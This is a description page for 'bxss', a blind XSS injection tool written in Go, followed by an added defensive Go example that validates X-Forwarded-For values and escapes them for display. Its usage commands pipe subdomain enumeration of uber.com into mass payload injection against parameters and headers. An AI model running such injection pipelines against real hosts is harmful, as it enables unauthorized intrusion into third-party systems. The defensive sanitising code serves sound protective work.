Bxss is a blind XSS injector written in Go that helps discover blind XSS vulnerabilities.
Inserts blind XSS payloads into custom headers
Inserts blind XSS payloads into parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
Works in a chain with other tools
Very fast
Easy to install
$ go get -u github.com/ethicalhackingplayground/bxss
Blind XSS In Parameters
$ subfinder uber.com | gau | grep "&" | bxss -appendMode -payload '">' -parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '">' -header "X-Forwarded-For"
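On the receiving side of the X-Forwarded-For case above, the header value is untrusted input that often ends up in logs and admin panels. The following Go code is an added example, not part of bxss or the original page; the names SplitXFF and LogCell and the sample values are assumptions made for illustration. It keeps only entries that parse as IP addresses and HTML-escapes anything rendered in a page.

```go
package main

import (
	"fmt"
	"html"
	"net/netip"
	"strings"
)

// SplitXFF (hypothetical helper) parses an X-Forwarded-For value.
// Entries that are valid IP addresses are returned in ips; everything
// else, such as injected markup, is returned in rejected so the request
// can be logged safely and alerted on.
func SplitXFF(value string) (ips []string, rejected []string) {
	for _, part := range strings.Split(value, ",") {
		entry := strings.TrimSpace(part)
		if entry == "" {
			continue
		}
		if addr, err := netip.ParseAddr(entry); err == nil {
			ips = append(ips, addr.String())
		} else {
			rejected = append(rejected, entry)
		}
	}
	return ips, rejected
}

// LogCell (hypothetical helper) HTML-escapes a request-derived value
// before it is placed in a back-office page, so stored markup is shown
// as text instead of being interpreted by the viewer's browser.
func LogCell(value string) string {
	return "<td>" + html.EscapeString(value) + "</td>"
}

func main() {
	// Constructed sample header values, not taken from real traffic.
	samples := []string{"203.0.113.7, 10.0.0.2", `203.0.113.7, "><b>probe</b>`}
	for _, s := range samples {
		ips, bad := SplitXFF(s)
		fmt.Printf("ips=%v rejected=%d cell=%s\n", ips, len(bad), LogCell(s))
	}
}
```

A non-empty rejected list on a header that should only carry addresses is a useful detection signal in its own right.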
You can download the program from here.